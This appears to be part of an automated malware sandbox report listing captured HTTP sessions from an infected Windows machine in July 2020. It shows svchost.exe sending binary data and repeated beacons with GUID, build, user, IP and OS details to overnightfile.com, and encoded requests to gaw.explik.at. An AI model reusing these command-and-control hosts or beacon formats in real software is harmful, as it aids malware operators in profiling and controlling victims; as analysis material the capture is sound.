                                                                                                                                      Jul 14, 2020 11:20:40.383061886 CEST572INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:39 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Connection: close
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 39 5f 5a 85 73 a9 ab 42 df 9e c8 70 45 bd 79 c9 2b 14 45 5a
                                                                                                                                      Data Ascii: 9_ZsBpEy+EZ


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      4192.168.1.1024971191.218.231.22680C:\Windows\SysWOW64\svchost.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Jul 14, 2020 11:20:47.536647081 CEST736OUTPOST /d2/about.php HTTP/1.0
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Accept-Encoding: identity, *;q=0
                                                                                                                                      Accept-Language: en-US
                                                                                                                                      Content-Length: 237
                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                      Content-Encoding: binary
                                                                                                                                      Jul 14, 2020 11:20:47.600995064 CEST736OUTData Raw: fd 57 60 9c 44 2e c2 6b e9 b4 3d b3 21 ba c1 dd 6e ce 4e 49 d9 07 c9 30 7a 4f f4 05 58 41 7e e2 8c a2 7d ff 55 57 3a 4c ef 43 64 db 91 27 fe b5 75 f7 cb 66 09 85 e8 88 6e e8 67 cd 44 e4 aa e1 ac cc 41 d1 7d 19 73 8d 31 a0 08 22 e9 1f 45 2b 92 1b
                                                                                                                                      Data Ascii: W`D.k=!nNI0zOXA~}UW:LCd'ufngDA}s1"E+-eS 8kC>xf|L^,uB'7OR:e:''Xr}TzZ?]v&=b^l1jAlACN]D.T|74O{=u@!e
                                                                                                                                      Jul 14, 2020 11:20:47.750269890 CEST736INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:47 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Connection: close
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 3a f8 56 3a 91 e5 d3 56 b2 fc 7f f7 6a
                                                                                                                                      Data Ascii: :V:Vj


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      5192.168.1.102497148.208.80.22680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Jul 14, 2020 11:21:19.842713118 CEST821OUTGET /webstore/kForBNOkuld/PMlfu1v0euSE_2/BxUhIJ7s_2Bzsa3aIvWWg/Plua7gYt6_2FPIim/H4JsNRqeFEmy2x5/kCDFDTJH_2B7v1zAt2/t_2By1xSF/iMqjoVQSyKnC4pmTEnMd/1Nda0IQeuWzmdIehoi2/vu8izqslTvsQLEp4RIGngf/VgE_2FejxR85f/5NpXiZBQ/xEFQXgMm80LfNjSS6LprzNc/_2FfZF02zj/WlTRAb5yIVLFDvRRQ/LisJTjFikyCJ/yXE4xWGBJrB/Twnb9Gc_0A_0Dt/NJP19L6X6zblGIbP5vDvW/9wRCcLW0TAdw4379/wFyXjYIF/T HTTP/1.1
                                                                                                                                      Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                      Accept-Language: en-US
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      Host: gaw.explik.at
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Jul 14, 2020 11:21:20.082928896 CEST821INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:20 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      Data Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 c4 93 53 f3 4a 52 8b ec 6c 32 0c d1 4d 00 8a d8 e8 43 a5 41 76 01 15 41 79 79 e9 99 79 15 c8 72 fa 20 d3 c1 0c a8 cb 00 90 3b 34 31 a2 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 7b(HML),I310Q/Qp/K&T*$'*gd*SJRl2MCAvAyyyr ;410


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      6192.168.1.1024971691.218.231.22680C:\Windows\SysWOW64\svchost.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Jul 14, 2020 11:21:37.244510889 CEST846OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:37.458062887 CEST846INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:37 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4b 5a 41 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cKZAPARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:37.790751934 CEST847OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:37.878901005 CEST847INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:37 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 46 5a 41 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cFZAUARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:38.188277006 CEST847OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:38.284400940 CEST848INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:37 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 48 5a 41 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cHZASARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:38.630260944 CEST848OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:38.720710039 CEST848INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:38 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 59 56 45 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cYVEBARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:39.026985884 CEST849OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:39.121481895 CEST849INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:38 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 42 42 59 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cBBYYARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:39.430454969 CEST850OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:39.522489071 CEST850INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:39 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 43 56 45 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cCVEXARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:39.831737995 CEST850OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:39.929546118 CEST850INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:39 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 56 56 45 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cVVEEARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:40.242073059 CEST851OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:40.340636969 CEST851INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:39 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 5a 41 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZZAAARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:40.675076008 CEST852OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:40.773619890 CEST852INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:40 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 46 46 55 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cFFUUARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:41.088870049 CEST852OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:41.181619883 CEST853INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:40 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 47 5a 41 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cGZATARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:41.521646976 CEST853OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:41.616925001 CEST853INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:41 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 41 5a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZAZAARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:41.933448076 CEST854OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:42.025422096 CEST854INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:41 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4d 42 59 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cMBYNARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:42.333851099 CEST854OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:42.443490028 CEST855INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:42 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 42 47 54 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cBGTYARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:42.742784977 CEST855OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:42.830826044 CEST856INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:42 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4a 4e 4d 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cJNMQARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:43.144378901 CEST856OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
